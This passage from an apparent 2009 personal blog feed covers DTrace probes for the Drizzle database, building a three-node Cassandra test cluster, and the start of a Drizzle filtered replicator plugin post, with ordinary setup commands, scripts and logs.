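#include &lt;vector&gt;

struct DeletePtrs
{
  template &lt;typename T&gt;
  void operator()(const T *ptr) const
  {
    delete ptr;
  }
};

/*
 * usage, given std::vector&lt;memcache::Memcache *&gt; servers:
 *
 *   std::for_each(servers.begin(), servers.end(), DeletePtrs());
 *   servers.clear();
 */
&lt;/pre&gt;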

&lt;h3&gt;Sample Usage&lt;/h3&gt;
Below, we show some samples of using the MyCache singleton. We assume that Product is some class that has been developed elsewhere that we want to cache.&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/189545.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

That's about it really. As you can see, the C++ interface has been improved in libmemcached. There is still some more work needed on the C++ interface, but I think it's starting to look a lot better.
</content>
 </entry>
 
 <entry>
   <title>Using DTrace with Drizzle</title>
   <link href="http://posulliv.github.com/2009/09/14/using-dtrace-with-drizzle"/>
   <updated>2009-09-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/14/using-dtrace-with-drizzle</id>
   <content type="html">&lt;p&gt;Over the weekend, I was reading about the DTrace support in MySQL and realized that the DTrace support in drizzle needed to be updated. Thus, I created a branch and went to work on porting the latest probes from MySQL 6.0 to drizzle. I proposed a branch for merging into trunk which contains most of the relevant static probes along with some small build fixes to ensure that the probes are correctly enabled. Hopefully, this branch will get merged in the next week or two. In this post, I'm going to give some really simple examples of using the static probes in drizzle along with pointers to various places where lots more information can be obtained on using dtrace (mostly with MySQL but it all applies to drizzle too really).&lt;/p&gt;

&lt;h2&gt;Building Drizzle with DTrace Support&lt;/h2&gt;

&lt;p&gt;First of all, the drizzle binary built on a platform with dtrace is not configured with dtrace support by default. Thus, we need to configure drizzle by passing it the --enable-dtrace option. The rest of the build and installation process is the same as normal. Note that I have not tested dtrace support on OSX and I believe it probably does not work correctly at the moment. This is something I'll aim to fix (with help from Monty) in the next few weeks.&lt;/p&gt;
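
&lt;p&gt;Concretely, a build with the probes enabled looks the same as a normal source build apart from that one configure flag:&lt;/p&gt;

&lt;pre&gt;
$ ./config/autorun.sh
$ ./configure --enable-dtrace
$ make
&lt;/pre&gt;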
&lt;p&gt;To verify that the probes were built correctly, you should get similar output when listing the probes available in dtrace:&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -l | grep drizzle | c++filt 
62444 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-done
62445 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) command-start
62446 drizzle11722          drizzled void Session::awake(Session::killed_state) connection-done
62447 drizzle11722          drizzled                 end_thread_signal connection-done
62448 drizzle11722          drizzled       void close_connections() connection-done
62449 drizzle11722          drizzled        bool Session::schedule() connection-start
62450 drizzle11722          drizzled bool mysql_delete(Session*,TableList*,Item*,st_sql_list*,unsigned long,unsigned long,bool) delete-done
62451 drizzle11722          drizzled bool drizzled::statement::Delete::execute() delete-start
62452 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-done
62453 drizzle11722          drizzled unsigned long filesort(Session*,Table*,st_sort_field*,unsigned,SQL_SELECT*,unsigned long,bool,unsigned long*) filesort-start
62454 drizzle11722          drizzled bool mysql_insert(Session*,TableList*,List&amp;,List&lt;List &gt;&amp;,List&amp;,List&amp;,enum_duplicates,bool) insert-done
62455 drizzle11722          drizzled     void select_insert::abort() insert-select-done
62456 drizzle11722          drizzled  bool select_insert::send_eof() insert-select-done
62457 drizzle11722          drizzled bool drizzled::statement::InsertSelect::execute() insert-select-start
62458 drizzle11722          drizzled bool drizzled::statement::Insert::execute() insert-start
62459 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-done
62460 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-done
62461 drizzle11722          drizzled void mysql_parse(Session*,const char*,unsigned,const char**) query-exec-start
62462 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-done
62463 drizzle11722          drizzled bool parse_sql(Session*,Lex_input_stream*) query-parse-start
62465 drizzle11722          drizzled bool dispatch_command(enum_server_command,Session*,char*,unsigned) query-start
62466 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-done
62467 drizzle11722          drizzled bool handle_select(Session*,LEX*,select_result*,unsigned long) select-start
62468 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&amp;,List&amp;,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-done
62469 drizzle11722          drizzled int mysql_update(Session*,TableList*,List&amp;,List&amp;,Item*,unsigned,order_st*,unsigned long,enum_duplicates,bool) update-start
$
&lt;/pre&gt;

&lt;h2&gt;Example Usage&lt;/h2&gt;
&lt;p&gt;I'm just going to show some sample scripts that I obtained from various other sources (these sources are listed later) related to DTrace with MySQL. The first simple script we will try measures query execution time (this does not include time for parsing):&lt;/p&gt;

&lt;pre&gt;
#!/usr/sbin/dtrace -s

#pragma ident   &quot;%Z%%M% %I%     %E% SMI&quot;

#pragma D option quiet
#pragma D option switchrate=10

dtrace:::BEGIN
{
        printf(&quot; %-16s %5s %3s %s\n&quot;, &quot;DATABASE&quot;, &quot;ms&quot;,
            &quot;RET&quot;, &quot;QUERY&quot;);
}

drizzle*:::query-exec-start
{
        self-&gt;start = timestamp;
        this-&gt;query = copyinstr(arg0);
        this-&gt;db = arg2 ? copyinstr(arg2) : &quot;.&quot;;
}

drizzle*:::query-exec-done
/self-&gt;start/
{
        this-&gt;elapsed = (timestamp - self-&gt;start) / 1000000;
        printf(&quot; %-16.16s %5d %3d %-32.32s\n&quot;,
            this-&gt;db, this-&gt;elapsed, (int)arg0, this-&gt;query);
        self-&gt;start = 0;
}
&lt;/pre&gt;

&lt;p&gt;The output from running that script on a toy instance of drizzle (unfortunately, I'm still a student so don't get to administer or play with any real databases) where I was running small queries is:&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -qp `pgrep drizzled` -s ./qestat.d
 DATABASE            ms RET QUERY
                      0   0 select @@version_comment limit 1
                      0   0 show databases
                      0   0 SELECT DATABASE()
 test                 0   0 show databases
 test                 0   0 show tables
 test                 0   0 show tables
 test                 0   0 select * from t1
 test                 5   0 create table t1(a int)
 test                 0   0 insert into t1 values (5), (6),
 test                 0   0 select * from t1
 test                 0   0 select a from t1 where a = 7
^C
$
&lt;/pre&gt;

&lt;p&gt;Next, let's write a simple script that uses the filesort probe:&lt;/p&gt;

&lt;pre&gt;
#!/usr/sbin/dtrace -s

#pragma ident   &quot;%Z%%M% %I%     %E% SMI&quot;

#pragma D option quiet
#pragma D option switchrate=10

drizzle$target:::query-start
{
  self-&gt;query = copyinstr (arg0);
  self-&gt;query_start = timestamp ;
}

drizzle$target:::filesort-start
{
  self-&gt;filesort_start = timestamp;
}

drizzle$target:::filesort-done
{
  self-&gt;filesort = timestamp - self-&gt;filesort_start;
}

drizzle$target:::query-done
/ self-&gt;query != 0 /
{
  printf(&quot;%s\n&quot;, self-&gt;query);
  printf(&quot;Total: %dus Filesort: %dus\n&quot;,
            (timestamp - self-&gt;query_start) / 1000,
            self-&gt;filesort / 1000);
  self-&gt;query = 0;
}
&lt;/pre&gt;

&lt;p&gt;The output from running that is (again, I have no data to play with here):&lt;/p&gt;

&lt;pre&gt;
$ pfexec dtrace -qp `pgrep drizzled` -s ./filesort.d
select @@version_comment limit 1
Total: 148us Filesort: 0us
show databases
Total: 595us Filesort: 0us
SELECT DATABASE()
Total: 114us Filesort: 0us
show databases
Total: 348us Filesort: 0us
show tables
Total: 274us Filesort: 0us
show fields in 't1'
Total: 112us Filesort: 0us
show tables
Total: 402us Filesort: 0us
select * from t1
Total: 292us Filesort: 0us
select * from t1 order by a
Total: 384us Filesort: 116us
^C
$
&lt;/pre&gt;

&lt;p&gt;There is lots more that can be done. Have a look at the resources below for many more examples that can be tried out on drizzle. I'm just beginning to play with DTrace in my spare time really so I'm not aware of all its capabilities and use cases. It would be cool to see something similar to the &lt;a href=&quot;http://opensolaris.org/os/community/dtrace/dtracetoolkit/&quot;&gt;DTrace Toolkit&lt;/a&gt; for drizzle though (like the Drizzle DTrace Toolkit...DDT).&lt;/p&gt;

&lt;h2&gt;More Information&lt;/h2&gt;
&lt;p&gt;A lot of articles and presentations have been produced on using DTrace with MySQL. Since the current probes in drizzle are just copied from MySQL, those articles and presentations are still pretty useful to read if you want to play around with the dtrace probes in drizzle. Here are some good ones that I have come across:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://assets.en.oreilly.com/1/event/21/DTrace%20Support%20in%20MySQL_%20Guide%20to%20Solving%20Real-life%20Performance%20Problems%20Presentation.pdf&quot;&gt;DTrace Support in MySQL: Guide to Solving Real-life Performance Problems &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://assets.en.oreilly.com/1/event/21/Deep-inspecting%20MySQL%20with%20DTrace%20Presentation.pdf&quot;&gt;Deep-inspecting MySQL with DTrace&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://forge.mysql.com/w/images/e/ec/MySQLUDTrace0901.pdf&quot;&gt;Using DTrace with MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://dev.mysql.com/tech-resources/articles/getting_started_dtrace_saha.html&quot;&gt;Getting Started with DTracing MySQL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.solarisinternals.com/wiki/index.php/DTrace_Topics_Databases&quot;&gt;DTrace Database Topics&lt;/a&gt; (from the Solaris Internals wiki)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Future Work&lt;/h2&gt;
&lt;p&gt;This is really just the beginning of adding dtrace support to drizzle. The largest issues right now are build related and ensuring that everything works correctly on both Solaris and OSX. The static probes that I defined were all copied from MySQL with some tiny modifications in places. I'd like to know what kinds of probes other people would like to see. Does anyone have any suggestions or ideas? I'd really like to hear from people who actually administer databases on what they would like to see.&lt;/p&gt;

&lt;p&gt;From a drizzle developer's perspective, one thing I hope to see in the future is the ability for plugins to add static probes if they wish. I also need to add the probes in the handler. The only reason those are not present at the moment is due to some build related issues that I hope to resolve in the next few weeks.&lt;/p&gt;
</content>
 </entry>
 
 <entry>
   <title>Building a Small Cassandra Cluster for Testing and Development</title>
   <link href="http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development"/>
   <updated>2009-09-07T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development</id>
   <content type="html">For college, I was playing with &lt;a href=&quot;http://incubator.apache.org/cassandra/&quot;&gt;cassandra&lt;/a&gt; and thought I would document my experience in setting up a small cassandra cluster for playing around with. For this article, I actually used virtual machines (3 of them). I am assuming that we have a fresh ubuntu installation on each node. I'm also assuming static IP addresses so the /etc/hosts file on each node will have the following entries (the actual IP addresses and host names can be whatever you like):

&lt;pre&gt;
192.168.221.138 cass01                  cass01
192.168.221.139 cass02                  cass02
192.168.221.140 cass03                  cass03
&lt;/pre&gt;

The process that I follow is to perform all the actions outlined below on one node and, before actually starting the cassandra service, clone the virtual machine as many times as I want. This makes it extremely quick for me to get up and running. I'm not going to go into detail on virtual machine cloning here as there is plenty of information on that topic elsewhere.

&lt;h2&gt;Required Packages&lt;/h2&gt;
Cassandra requires very little to run:
&lt;ul&gt;
	&lt;li&gt;Java 1.6&lt;/li&gt;
	&lt;li&gt;Ant&lt;/li&gt;
	&lt;li&gt;svn or git (only if you wish to obtain the latest code from trunk)&lt;/li&gt;
&lt;/ul&gt;
These packages can be installed easily:

&lt;pre&gt;
$ sudo apt-get install sun-java6-jdk ant git-core
&lt;/pre&gt;

&lt;h2&gt;Create &quot;cassandra&quot; User and Directories&lt;/h2&gt;
The following tasks will be performed on all nodes that we want in the cluster (as mentioned, I perform these actions on just one virtual machine and then clone it multiple times). We are going to create a user account and group that cassandra will run as.

&lt;pre&gt;
$ sudo groupadd -g 501 cassandra
$ sudo useradd -m -u 501 -g cassandra -d /home/cassandra -s /bin/bash \
&gt; -c &quot;Cassandra Software Owner&quot; cassandra
$ id cassandra
uid=501(cassandra) gid=501(cassandra) groups=501(cassandra)
$ sudo passwd cassandra
&lt;/pre&gt;

Next, we create directories for storing the software, data, commit logs, and configuration files.

&lt;pre&gt;
$ sudo mkdir -p /opt/cassandra
$ sudo mkdir -p /opt/cassandra/source
$ sudo mkdir -p /opt/cassandra/logs
$ sudo mkdir -p /opt/cassandra/callouts
$ sudo mkdir -p /opt/cassandra/bootstrap
$ sudo mkdir -p /opt/cassandra/staging
$ sudo mkdir -p /opt/cassandra/conf
$ sudo mkdir -p /u01/cassandra/data
$ sudo mkdir -p /u02/cassandra/commitlog
$ sudo chown -R cassandra:cassandra /opt/cassandra
$ sudo chown -R cassandra:cassandra /u01/cassandra
$ sudo chown -R cassandra:cassandra /u02/cassandra
$ sudo chmod -R 755 /opt/cassandra
$ sudo chmod -R 755 /u01/cassandra
$ sudo chmod -R 755 /u02/cassandra
&lt;/pre&gt;

Above, we are making the assumption that /u01 and /u02 are separate disks. Of course, I do not have separate disks here, but in reality the ideal scenario would be to store the commit logs and data on separate disks. In order to make administration easier, we add the following to the cassandra user's .bashrc file (or .bash_profile):

&lt;pre&gt;
export JAVA_HOME=/usr/lib/jvm/java-6-sun

export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_PATH=$CASSANDRA_HOME/bin

export PATH=$CASSANDRA_PATH:$PATH
&lt;/pre&gt;

Obviously, the various environment variables should be set to whatever is appropriate for your environment if you are deviating from what I am setting up here.

&lt;h2&gt;Download Cassandra&lt;/h2&gt;
There are a number of options for downloading cassandra (we will use git in this article):
&lt;ul&gt;
	&lt;li&gt;&lt;a href=&quot;http://incubator.apache.org/cassandra/#download&quot;&gt;Stable Releases&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://hudson.zones.apache.org/hudson/job/Cassandra/lastSuccessfulBuild/artifact/cassandra/build/&quot;&gt;Nightly Development Snapshots&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;Latest Code from trunk&lt;/li&gt;
&lt;/ul&gt;
Running the latest code in trunk is not recommended as it is not a stable release. However, I'm going to use the latest version of the repository (cloned from the git read-only repository) for this article as I'm interested in following the development of cassandra. Thus, I'll use git to retrieve the latest code:

&lt;pre&gt;
$ su - cassandra
$ cd /opt/cassandra/source
$ git clone git://git.apache.org/cassandra.git latest
&lt;/pre&gt;

&lt;h2&gt;Build and Configure Cassandra&lt;/h2&gt;
Now, we need to build the software:

&lt;pre&gt;
$ su - cassandra
$ cd $CASSANDRA_HOME
$ ant
Buildfile: build.xml

build-subprojects:

init:
    [mkdir] Created dir: /opt/cassandra/source/latest/build/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/build/test/classes
    [mkdir] Created dir: /opt/cassandra/source/latest/src/gen-java

check-gen-cli-grammar:

gen-cli-grammar:
     [echo] Building Grammar /opt/cassandra/source/latest/src/java/org/apache/cassandra/cli/Cli.g  ....

build-project:
     [echo] apache-cassandra-incubating: /opt/cassandra/source/latest/build.xml
    [javac] Compiling 254 source files to /opt/cassandra/source/latest/build/classes
    [javac] Note: Some input files use or override a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

build:

BUILD SUCCESSFUL
Total time: 10 seconds
$
&lt;/pre&gt;

We would like to be able to keep configuration files out of the main source tree so we copy the sample configuration files provided with the source to a particular configuration directory we maintain for cassandra:

&lt;pre&gt;
$ cp -R $CASSANDRA_HOME/conf/* $CASSANDRA_CONF
$ cp $CASSANDRA_HOME/bin/cassandra.in.sh $CASSANDRA_INCLUDE
$ cd $CASSANDRA_CONF
$ ls -l
total 24
-rw-r--r-- 1 cassandra cassandra  1886 2009-09-05 16:05 cassandra.in.sh
-rw-r--r-- 1 cassandra cassandra  1664 2009-09-05 14:51 log4j.properties
-rw-r--r-- 1 cassandra cassandra 13926 2009-09-05 14:51 storage-conf.xml
$
&lt;/pre&gt;

The cassandra.in.sh file can be used to specify JVM options (such as the maximum heap size). Within the cassandra.in.sh file we copied over, various options can be set but we need to remove the following lines (as we have already defined CASSANDRA_CONF):

&lt;pre&gt;
# The directory where Cassandra's configs live (required)
CASSANDRA_CONF=$cassandra_home/conf
&lt;/pre&gt;
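
For example, the JVM heap limits live in the JVM_OPTS definition in this file. A trimmed sketch of the relevant portion (the exact contents of cassandra.in.sh vary between versions, so treat this as illustrative):

&lt;pre&gt;
# in $CASSANDRA_CONF/cassandra.in.sh - JVM options passed to the daemon
JVM_OPTS=&quot; \
        -ea \
        -Xms128m \
        -Xmx1G&quot;
&lt;/pre&gt;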

The first configuration file which we modify is the storage-conf.xml file. The main portions which we modify are:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/288454.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The storage-conf.xml configuration file is well commented and provides ample explanation on the various parameters that can be configured. It is worth reading through that file when you are wondering what can be tweaked in cassandra.  Next, we need to configure the logging properties for the system. These properties are specified in the log4j.properties file (again in the $CASSANDRA_CONF directory). The portion to modify is:

&lt;pre&gt;
# Edit the next line to point to your logs directory
log4j.appender.R.File=/opt/cassandra/logs/system.log
&lt;/pre&gt;

&lt;h2&gt;Starting/Stopping Cassandra&lt;/h2&gt;
First, let's start cassandra on one node in the foreground to ensure that everything is set up correctly. Open two terminal windows and, in one of them, start cassandra in the foreground:

&lt;pre&gt;
$ su - cassandra
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 66210133872783152550171468874444798372
DEBUG - Starting to listen on 127.0.1.1:7001
DEBUG - Binding thrift service to cass01:9160
INFO - Cassandra starting up...
&lt;/pre&gt;

Now, in the other terminal window, use the cassandra command-line interface to connect to the instance we just started:

&lt;pre&gt;
$ su - cassandra
$ cassandra-cli --host cass01 --port 9160
Connected to cass01/9160
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
cassandra&gt; help
List of all CLI commands:
?                                                      Same as help.
connect \&lt;hostname&gt;/&lt;port&gt;                              Connect to Cassandra's thrift service.
describe keyspace &lt;keyspacename&gt;                       Describe keyspace.
exit                                                   Exit CLI.
help                                                   Display this help.
quit                                                   Exit CLI.
show config file                                       Display contents of config file
show cluster name                                      Display cluster name.
show keyspaces                                         Show list of keyspaces.
show version                                           Show server version.
get &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']                             Get a slice of columns.
get &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']['&lt;colKey&gt;']                 Get a column value.
set &lt;tbl&gt;.&lt;cf&gt;['&lt;rowKey&gt;']['&lt;colKey&gt;'] = '&lt;value&gt;'     Set a column.
cassandra&gt; show version
0.4.0
cassandra&gt; exit
$
&lt;/pre&gt;

The cassandra script provided in the bin directory can be used to start cassandra, but I wanted a script that I could use to easily start/stop a cassandra instance. Here is an extremely simple script I created that we can use to start and stop cassandra:

&lt;pre&gt;
#!/bin/bash
#
# /etc/init.d/cassandra
#
# Startup script for Cassandra
#

export JAVA_HOME=/usr/lib/jvm/java-6-sun
export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_OWNR=cassandra
export PATH=$PATH:$CASSANDRA_HOME/bin
log_file=/opt/cassandra/logs/stdout
pid_file=/opt/cassandra/logs/pid_file

if [ ! -f $CASSANDRA_HOME/bin/cassandra -o ! -d $CASSANDRA_HOME ]
then
    echo &quot;Cassandra startup: cannot start&quot;
    exit 1
fi

case &quot;$1&quot; in
    start)
        # Cassandra startup
        echo -n &quot;Starting Cassandra: &quot;
        su $CASSANDRA_OWNR -c &quot;$CASSANDRA_HOME/bin/cassandra -p $pid_file&quot; &gt; $log_file 2&gt;&amp;1
        echo &quot;OK&quot;
        ;;
    stop)
        # Cassandra shutdown
        echo -n &quot;Shutdown Cassandra: &quot;
        su $CASSANDRA_OWNR -c &quot;kill `cat $pid_file`&quot;
        echo &quot;OK&quot;
        ;;
    reload|restart)
        $0 stop
        $0 start
        ;;
    status)
        ;;
    *)
        echo &quot;Usage: `basename $0` start|stop|restart|reload&quot;
        exit 1
esac

exit 0
&lt;/pre&gt;

The above script can be used to ensure that a cassandra service starts and stops automatically on startup/shutdown of our nodes. This might not be what you want but if it is, you would ensure the script is run at startup/shutdown by copying the script to /etc/init.d and doing the following:

&lt;pre&gt;
$ sudo chmod a+x /etc/init.d/cassandra
$ cd /etc/init.d
$ sudo update-rc.d cassandra defaults 99
update-rc.d: warning: /etc/init.d/cassandra missing LSB information
update-rc.d: see &lt;http://wiki.debian.org/LSBInitScripts&gt;
 Adding system startup for /etc/init.d/cassandra ...
   /etc/rc0.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc1.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc6.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc2.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc3.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc4.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc5.d/S99cassandra -&gt; ../init.d/cassandra
$
&lt;/pre&gt;

&lt;h2&gt;Adding New Nodes&lt;/h2&gt;

Now that we have 1 node up and running, it's time to add more nodes to our cassandra cluster. This is an extremely simple process once the initial node has been set up. Assuming we have performed all the steps listed above on another node (or simply cloned a virtual machine with these steps performed, as I am doing), all we need to do is modify the cassandra configuration files on the new nodes. I wish to add 2 new nodes so I will modify the appropriate portion of the storage-conf.xml configuration file to indicate this:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/288458.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
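
In essence, the change the gist above makes is to the Seeds section of storage-conf.xml on each new node; using this article's host names, it would look something like the following (element names as in the 0.4-era configuration file):

&lt;pre&gt;
&lt;!-- point the new node at the initial node so gossip can bootstrap --&gt;
&lt;Seeds&gt;
    &lt;Seed&gt;cass01&lt;/Seed&gt;
&lt;/Seeds&gt;
&lt;/pre&gt;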


Now, let's start the cass02 node in the foreground to see what happens. We would expect to see some indication in the output that the node learns about the other available node (in this case cass01):

&lt;pre&gt;
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 107959976695419204492109802329269912484
DEBUG - Starting to listen on 192.168.221.139:7001
DEBUG - Binding thrift service to cass02:9160
INFO - Cassandra starting up...
INFO - Node 192.168.221.138:7001 has now joined.
DEBUG - CHANGE IN STATE FOR 192.168.221.138:7001 - has token 65882889577194449649405650603559126735
&lt;/pre&gt;

Ok, now let's start the cassandra service on cass02 properly using the script I showed earlier. Let's monitor the system log on the initial node we set up (cass01) to see what happens:

&lt;pre&gt; 
INFO [main] 2009-09-07 02:16:14,851 CassandraDaemon.java (line 142) Cassandra starting up...
INFO [GMFD:1] 2009-09-07 02:17:36,433 Gossiper.java (line 630) Node 192.168.221.139:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:17:36,435 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.139:7001 - has token 107959976695419204492109802329269912484
&lt;/pre&gt;

Next, let's start the cassandra service on another node (cass03) and see what happens in the system logs of the initial node (cass01). Note that the storage-conf.xml file on this new node will require the same modifications as mentioned for the cass02 node (the Seeds directive).

&lt;pre&gt; 
INFO [GMFD:1] 2009-09-07 02:18:44,827 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:18:44,828 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
&lt;/pre&gt;

Next, we will shut down the cass03 node and monitor the system logs, where we will observe the following:

&lt;pre&gt; 
INFO [Timer-1] 2009-09-07 02:19:05,960 Gossiper.java (line 234) EndPoint 192.168.221.140:7001 is now dead.
&lt;/pre&gt;

Now, let's start cass03 back up again to see what happens:

&lt;pre&gt; 
INFO [GMFD:1] 2009-09-07 02:20:30,737 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 465)
Sending hinted data to 192.168.221.140:7000
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,743
HintedHandOffManager.java (line 200) Started hinted handoff for endPoint 192.168.221.140
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,760
HintedHandOffManager.java (line 235) Finished hinted handoff for endpoint 192.168.221.140
&lt;/pre&gt;

Now all 3 nodes are back in the cluster again. We can see how easy it is to add new nodes. We simply need to inform the new node of some other nodes in the cluster (not necessarily all of them due to the gossip-based membership protocol).

&lt;h2&gt;Conclusion&lt;/h2&gt;
The main reason I wrote this post is because I wanted to document my experience in setting up a small cassandra cluster for future reference. I'm taking a &lt;a href=&quot;http://lagoon.cs.umd.edu/classes/818fall09/&quot;&gt;class&lt;/a&gt; this semester in distributed systems for fun (since I've satisfied the course requirements for my program) which involves a semester project, and one project that I've been toying with in my mind is performing an experimental evaluation of various failure detectors. For example, cassandra uses the phi-accrual failure detector from Hayashibara et al.'s &lt;a href=&quot;http://ddg.jaist.ac.jp/pub/HDY+04.pdf&quot;&gt;paper&lt;/a&gt;, but there is a multitude of other possible failure detectors that could be used. I'm thinking of implementing and evaluating various failure detectors in real systems such as cassandra and &lt;a href=&quot;http://project-voldemort.com/&quot;&gt;voldemort&lt;/a&gt;. It is one possibility for a project that I've thought of (which I have not run by the professor yet). I've implemented a different failure detector in cassandra already this week, but performing an evaluation of a failure detector is not an easy process (what metrics to use to evaluate a failure detector is itself an interesting question). However, if anyone can think of any other interesting project in distributed systems that might allow me to make a contribution to one of these open-source projects, that would be awesome! Anyway, that's all I've got for now. A really good article to read next is &lt;a href=&quot;http://blog.evanweaver.com/articles/2009/07/06/up-and-running-with-cassandra/&quot;&gt;this one&lt;/a&gt;, which goes into some detail on actually using cassandra.
</content>
 </entry>
 
 <entry>
   <title>Developing a Replicator Plugin for Drizzle</title>
   <link href="http://posulliv.github.com/2009/07/24/developing-a-replicator-plugin-for-drizzle"/>
   <updated>2009-07-24T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/07/24/developing-a-replicator-plugin-for-drizzle</id>
   <content type="html">Recently, I started working on a plugin that performs direct to Memcached replication in Drizzle. While working on this, I found that I wanted to be able to filter replication events based on schema or table names. I went ahead and implemented this in my Memcached plugin but then realized that this functionality would be better off as its own plugin as I imagine filtering of replication events will be a pretty common task people will want to perform. This led me to start working on a filtered replicator plugin for Drizzle. Before diving in to the plugin implementation, I should mention that &lt;a href=&quot;http://www.jpipes.com/&quot;&gt;Jay Pipes&lt;/a&gt; has previously &lt;a href=&quot;http://www.jpipes.com/index.php?/archives/290-Towards-a-New-Modular-Replication-Architecture.html&quot;&gt;written in significant detail&lt;/a&gt; on the replication architecture in Drizzle. I recommend reading that post from Jay if you are not familiar with replication in Drizzle before proceeding with this post.&lt;br&gt;

Jay is currently working on providing documentation regarding replication in Drizzle and you can track that work on the &lt;a href=&quot;http://drizzle.org/wiki/Replication&quot;&gt;wiki page&lt;/a&gt; he created. It's still a work in progress, so if you really want to discover how all this works in Drizzle, I recommend having a look at the source code. Jay's work contains a copious amount of comments and is not difficult to read or understand; I highly recommend it. If you are interested in getting involved with this replication development, I'm sure Jay would be more than happy to get some contributors involved. The best way to get started is to ping the mailing list or one of the developers on #drizzle on FreeNode to indicate your interest.&lt;br&gt;

&lt;strong&gt;Development of the Replicator Plugin&lt;/strong&gt;

As with any plugin in Drizzle, there are three files that are important for building the plugin:
&lt;ul&gt;
	&lt;li&gt;plugin.ini&lt;/li&gt;
	&lt;li&gt;plugin.ac&lt;/li&gt;
	&lt;li&gt;plugin.am&lt;/li&gt;
&lt;/ul&gt;
Only the plugin.ini file is mandatory. This file is a standard ini-file that currently contains only one section - [plugin]. For the filtered replicator plugin, the plugin.ini file looked like:&lt;br&gt;

&lt;pre&gt;
[plugin]
name=filtered_replicator
title=Filtered Replicator
description=A simple filtered replicator which allows a user to filter out
            events based on a schema or table name
load_by_default=yes
sources=filtered_replicator.cc
headers=filtered_replicator.h
&lt;/pre&gt;

